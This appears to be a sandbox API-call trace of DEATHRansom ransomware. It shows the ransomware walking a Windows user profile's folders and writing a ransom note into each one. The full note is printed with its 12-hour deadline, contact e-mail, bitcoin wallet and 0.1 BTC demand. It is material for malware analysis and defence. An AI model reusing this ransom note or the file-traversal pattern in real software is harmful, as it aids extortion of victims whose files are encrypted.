lstrcpyW (in: lpString1=0x8be0050, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0074.539] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 80 [0074.539] QueueUserWorkItem (Function=0x40a710, Context=0x8be0050, Flags=0x0) returned 1 [0074.539] GetProcessHeap () returned 0x280000 [0074.539] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ae00d0 [0074.539] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 46 [0074.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0074.539] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\read_me.txt") returned 56 [0074.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.585] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.585] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.586] CloseHandle (hObject=0x780) returned 1 [0074.586] GetProcessHeap () returned 0x280000 [0074.586] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ae00d0 | out: hHeap=0x280000) returned 1 [0074.586] lstrcpyW (in: lpString1=0x8ae00d0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0074.586] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 81 [0074.586] QueueUserWorkItem (Function=0x40a710, Context=0x8ae00d0, Flags=0x0) returned 1 [0074.587] GetProcessHeap () returned 0x280000 [0074.587] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af00d8 [0074.587] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned 45 [0074.587] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0074.587] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\read_me.txt") returned 55 [0074.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.588] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.588] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.588] CloseHandle (hObject=0x780) returned 1 [0074.589] GetProcessHeap () returned 0x280000 [0074.589] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af00d8 | out: hHeap=0x280000) returned 1 [0074.589] lstrcpyW (in: lpString1=0x8af00d8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0074.589] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 82 [0074.589] QueueUserWorkItem (Function=0x40a710, Context=0x8af00d8, Flags=0x0) returned 1 [0074.589] GetProcessHeap () returned 0x280000 [0074.589] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c33080 [0074.590] wnsprintfW (in: pszDest=0x8c33080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 42 [0074.590] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.591] lstrcpyW (in: lpString1=0x8c43088, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY" [0074.591] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 83 [0074.591] QueueUserWorkItem (Function=0x40a710, Context=0x8c43088, Flags=0x0) returned 1 [0074.591] GetProcessHeap () returned 0x280000 [0074.591] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c53090 [0074.592] wnsprintfW (in: pszDest=0x8c53090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\*") returned 63 [0074.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1556a940, ftCreationTime.dwHighDateTime=0x1d4d3fb, ftLastAccessTime.dwLowDateTime=0xdea3dd90, ftLastAccessTime.dwHighDateTime=0x1d4c8d4, ftLastWriteTime.dwLowDateTime=0xdea3dd90, ftLastWriteTime.dwHighDateTime=0x1d4c8d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.593] lstrcpyW (in: lpString1=0x8c63098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV" [0074.593] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 84 [0074.593] QueueUserWorkItem (Function=0x40a710, Context=0x8c63098, Flags=0x0) returned 1 [0074.593] GetProcessHeap () returned 0x280000 [0074.593] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c730a0 [0074.594] wnsprintfW (in: pszDest=0x8c730a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\*") returned 84 [0074.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a60d90, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x8bb66280, ftLastAccessTime.dwHighDateTime=0x1d4caee, ftLastWriteTime.dwLowDateTime=0x8bb66280, ftLastWriteTime.dwHighDateTime=0x1d4caee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.594] lstrcpyW (in: lpString1=0x8c830a8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f" [0074.594] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 85 [0074.594] QueueUserWorkItem (Function=0x40a710, Context=0x8c830a8, Flags=0x0) returned 1 [0074.594] GetProcessHeap () returned 0x280000 [0074.594] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c930b0 [0074.595] wnsprintfW (in: pszDest=0x8c930b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\*") returned 99 [0074.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\*", lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c4517a0, ftCreationTime.dwHighDateTime=0x1d4d002, ftLastAccessTime.dwLowDateTime=0xdae7cc0, ftLastAccessTime.dwHighDateTime=0x1d4cd4a, ftLastWriteTime.dwLowDateTime=0xdae7cc0, ftLastWriteTime.dwHighDateTime=0x1d4cd4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.596] lstrcpyW (in: lpString1=0x8ca30b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4" [0074.596] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 86 [0074.596] QueueUserWorkItem (Function=0x40a710, Context=0x8ca30b8, Flags=0x0) returned 1 [0074.596] GetProcessHeap () returned 0x280000 [0074.596] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cb30c0 [0074.597] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\*") returned 120 [0074.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\*", lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82c5db40, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0xa706ee20, ftLastAccessTime.dwHighDateTime=0x1d4c921, ftLastWriteTime.dwLowDateTime=0xa706ee20, ftLastWriteTime.dwHighDateTime=0x1d4c921, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2778 [0074.598] lstrcpyW (in: lpString1=0x8cc30c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp" [0074.598] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 87 [0074.598] QueueUserWorkItem (Function=0x40a710, Context=0x8cc30c8, Flags=0x0) returned 1 [0074.598] GetProcessHeap () returned 0x280000 [0074.598] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cd30d0 [0074.599] wnsprintfW (in: pszDest=0x8cd30d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\*") returned 126 [0074.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\*", lpFindFileData=0x17d228 | out: lpFindFileData=0x17d228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fc21bf0, ftCreationTime.dwHighDateTime=0x1d4ca7b, ftLastAccessTime.dwLowDateTime=0x6b7803b0, ftLastAccessTime.dwHighDateTime=0x1d4c5ef, ftLastWriteTime.dwLowDateTime=0x6b7803b0, ftLastWriteTime.dwHighDateTime=0x1d4c5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b27b8 [0074.600] lstrcpyW (in: lpString1=0x8ce30d8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\loCeH5j" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\loCeH5j") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\loCeH5j" [0074.600] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 88 [0074.600] QueueUserWorkItem (Function=0x40a710, Context=0x8ce30d8, Flags=0x0) returned 1 [0074.600] GetProcessHeap () returned 0x280000 [0074.600] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cf30e0 [0074.601] wnsprintfW (in: pszDest=0x8cf30e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\loCeH5j\\*") returned 134 [0074.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\OTHrp\\loCeH5j\\*", lpFindFileData=0x17cfb0 | out: lpFindFileData=0x17cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c61820, ftCreationTime.dwHighDateTime=0x1d4c6f9, ftLastAccessTime.dwLowDateTime=0xdaa8cc50, ftLastAccessTime.dwHighDateTime=0x1d4cf91, ftLastWriteTime.dwLowDateTime=0xdaa8cc50, ftLastWriteTime.dwHighDateTime=0x1d4cf91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b27f8 [0074.648] lstrcpyW (in: lpString1=0x8cd30d0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\Yc7HrpfACBbQ" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\Yc7HrpfACBbQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\Yc7HrpfACBbQ" [0074.648] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 89 [0074.649] QueueUserWorkItem (Function=0x40a710, Context=0x8cd30d0, Flags=0x0) returned 1 [0074.649] GetProcessHeap () returned 0x280000 [0074.649] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cf30e0 [0074.649] wnsprintfW (in: pszDest=0x8cf30e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\Yc7HrpfACBbQ\\*") returned 133 [0074.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\eCmLS5aDoTgJ1f\\31Adh2G L26WGGgHvrt4\\Yc7HrpfACBbQ\\*", lpFindFileData=0x17d228 | out: lpFindFileData=0x17d228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e84c4d0, ftCreationTime.dwHighDateTime=0x1d4cc4d, ftLastAccessTime.dwLowDateTime=0xccd2c220, ftLastAccessTime.dwHighDateTime=0x1d4cd02, ftLastWriteTime.dwLowDateTime=0xccd2c220, ftLastWriteTime.dwHighDateTime=0x1d4cd02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b27b8 [0074.761] lstrcpyW (in: lpString1=0x8c930b0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\Hxr9d4o_z0PsvLg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\Hxr9d4o_z0PsvLg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\Hxr9d4o_z0PsvLg" [0074.761] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 90 [0074.761] QueueUserWorkItem (Function=0x40a710, Context=0x8c930b0, Flags=0x0) returned 1 [0074.761] GetProcessHeap () returned 0x280000 [0074.761] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cb30c0 [0074.761] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\Hxr9d4o_z0PsvLg\\*") returned 100 [0074.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 